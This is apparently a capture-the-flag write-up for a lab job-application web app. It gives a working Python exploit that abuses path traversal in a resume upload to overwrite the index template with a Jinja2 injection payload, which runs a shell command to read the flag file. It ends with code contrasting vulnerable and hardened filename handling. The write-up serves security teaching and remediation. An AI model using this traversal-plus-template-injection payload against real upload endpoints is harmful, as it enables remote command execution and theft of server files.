Diefunction

Careers


Last updated 2 years ago


IP Address: 172.20.0.3
Port: 80
URL:

Description

Find and apply to career opportunities at TCC.

Structure

.
├── app
│   ├── __init__.py
│   ├── routes.py
│   ├── static
│   │   └── assets
│   │       ├── css
│   │       │   └── careers.css
│   │       ├── img
│   │       │   └── construction.jpg
│   │       └── js
│   ├── templates
│   │   ├── includes
│   │   │   ├── footer.html
│   │   │   ├── header.html
│   │   │   └── scripts.html
│   │   ├── index.html
│   │   └── layouts
│   │       └── base.html
│   ├── uploads
│   └── views.py
├── flag.txt
└── run.py
10 directories, 12 files

Solution

Install pip for Python

sudo apt install python3-pip

Install requests for the exploit

python3 -m pip install requests

Exploit

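from requests import post, get

# The upload handler uses the client-supplied filename as-is, so a relative
# path resolves outside the uploads directory.
filename = '../templates/index.html' # the index.html template path to overwrite

# Template expression that is rendered the next time the index page is served.
# Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
payload = b'{{ cycler.__init__.__globals__.os.popen(\'cat /usr/src/app/flag.txt\').read() }}'
files = {'file': (filename, payload, 'text/html')}

url = 'http://172.20.0.3' # no trailing slash, so url + endpoint has a single '/'
endpoint = '/api/v1/upload/resume'

# Upload the file; it overwrites the index template.
response = post(url + endpoint, files = files)

# Request the index page, which now renders the overwritten template.
response = get(url + '/')
print(f'Flag: {response.text}')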

Flag

└─$ python3 exploit.py 
Flag: TCC{34$Y_USE_SECURE_FILENAME}

Explanation

http://172.20.0.3/
What is server-side template injection?
Server-side template injection payloads
Path Traversal
Unrestricted File Upload
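
The flag names the fix: sanitise the uploaded filename before using it as a path. The following is an added example, not the challenge's code (the page does not show the upload handler); it puts the vulnerable path join beside a hardened one. The upload directory is inferred from the tree and flag path above, and the function names and allowed extensions are assumptions.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Assumed layout, inferred from the tree and flag path above (handler code is not on the page).
UPLOAD_DIR = PurePosixPath("/usr/src/app/app/uploads")
ALLOWED_EXTENSIONS = {".pdf", ".doc", ".docx"}  # assumption: formats a resume upload needs


def naive_destination(client_filename: str) -> PurePosixPath:
    """Vulnerable pattern: the client-supplied name is joined unchanged."""
    return PurePosixPath(posixpath.normpath(UPLOAD_DIR / client_filename))


def safe_destination(client_filename: str) -> PurePosixPath:
    """Hardened pattern: strip directories, allow-list characters and
    extension, then confirm the result is still inside UPLOAD_DIR."""
    # Treat both separator styles as directories; keep only the last component.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Replace anything outside a conservative character set; drop leading dots.
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name).lstrip(".")
    if not name:
        raise ValueError("empty filename")
    if PurePosixPath(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {name!r}")
    dest = PurePosixPath(posixpath.normpath(UPLOAD_DIR / name))
    # Defence in depth: refuse any destination outside the upload directory.
    if dest.parent != UPLOAD_DIR:
        raise ValueError("path escapes upload directory")
    return dest


def check(client_filename: str) -> str:
    """Return the safe destination, or the reason the name was rejected."""
    try:
        return str(safe_destination(client_filename))
    except ValueError as exc:
        return f"rejected ({exc})"


if __name__ == "__main__":
    # Constructed sample names; the first is the filename used in the write-up.
    for sample in ["../templates/index.html", "../templates/cv.pdf", "cv.pdf"]:
        print(f"{sample!r}: naive -> {naive_destination(sample)}, safe -> {check(sample)}")
```

In a Flask application, werkzeug.utils.secure_filename performs the name-sanitising step; the extension allow-list and the containment check remain separate controls.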